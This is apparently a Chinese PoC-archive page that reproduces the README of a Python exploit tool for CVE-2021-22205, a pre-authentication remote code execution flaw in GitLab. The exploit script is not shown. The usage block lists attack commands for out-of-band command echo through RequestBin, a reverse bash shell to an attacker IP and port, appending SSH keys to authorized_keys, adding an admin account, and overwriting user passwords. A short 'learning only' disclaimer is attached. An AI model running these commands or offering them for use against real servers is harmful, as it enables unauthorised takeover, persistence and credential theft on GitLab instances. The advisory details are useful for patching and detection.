关联漏洞
标题:
GitLab 代码注入漏洞
(CVE-2021-22205)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 Gitlab Community Edition 存在代码注入漏洞,该漏洞源于图像解析器在处理图像文件时输入验证不正确。以下产品及版本受到影响::Gitlab Community Edition: 11.9.0, 11.9.1, 11.9.2, 11.9.3, 11.9.4, 11.9.5, 11.9.6, 11.9.7, 11.9.8, 11.9.9, 11
描述
GitLab CE/EE Preauth RCE using ExifTool
介绍
# CVE-2021-22205
GitLab CE/EE Preauth RCE using ExifTool
*This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last **DO NOT USE IT ILLEGALLY** If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities*
## Description
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Affect Versions:
- \>=11.9, <13.8.8
- \>=13.9, <13.9.6
- \>=13.10, <13.10.3
## Features
- Gitlab version detection through the hash in Webpack manifest.json
- Automatical out-of-band interactions with DNSLog & ~~PostBin~~ **RequestBin**
- Support Reverse Bash Shell / Append SSH Key to authorized_keys
- Support ENTER to modify and restore gitlab user password
## Usage
```bash
🐚 ››› python CVE-2021-22205.py
░░░░▐▐░░░ CVE-2021-22205
▐ ░░░░░▄██▄▄ GitLab CE/EE Unauthenticated RCE using ExifTool
▀▀██████▀░░ Affecting all versions starting from 11.9
░░▐▐░░▐▐░░ security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
▒▒▒▐▐▒▒▐▐▒ github.com/inspiringz/CVE-2021-22205
Usage:
python3 CVE-2021-22205.py -u site_url -m detect # gitlab version & vuln detect
python3 CVE-2021-22205.py -u site_url -m rce1 'id' # rce (echo via requestbin oob)
python3 CVE-2021-22205.py -u site_url -m rce2 'id' # rce (echo via write file) *
python3 CVE-2021-22205.py -u site_url -m rev ip port # reverse bash shell
python3 CVE-2021-22205.py -u site_url -m ssh git/root # append ssh authorized_keys
python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
python3 CVE-2021-22205.py -u site_url -m mod user # modify specified user's password => P4ss@GitLab
python3 CVE-2021-22205.py -u site_url -m rec user # restore specified user's original password
```
- The `site_url` parameter format: http[s]://<domain|ip>[:port]/, such as: https://example.com:9000/
- Methods(rce2,add) marked by `*` is unstable, may not work :(
- You can modify the script content according to the actual environment
## Screenshot
Detect:
RCE(Echo via RequestBin OOB):
Reverse Bash Shell:
Append SSH Key to authorized_keys:
Gitlab user password modification and restoration:
## Reference
- https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://github.com/righel/gitlab-version-nse
文件快照
[4.0K] /data/pocs/1879976ce381cc9f267707936bc0c133c31bb7d7
├── [ 54K] CVE-2021-22205.py
├── [4.0K] images
│ ├── [216K] image-20211111131442470.png
│ ├── [509K] image-20211111132115090.png
│ ├── [649K] image-20211111133555010.png
│ ├── [169K] image-20220116233646585.png
│ └── [372K] image-20220116234003576.png
└── [3.1K] README.md
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。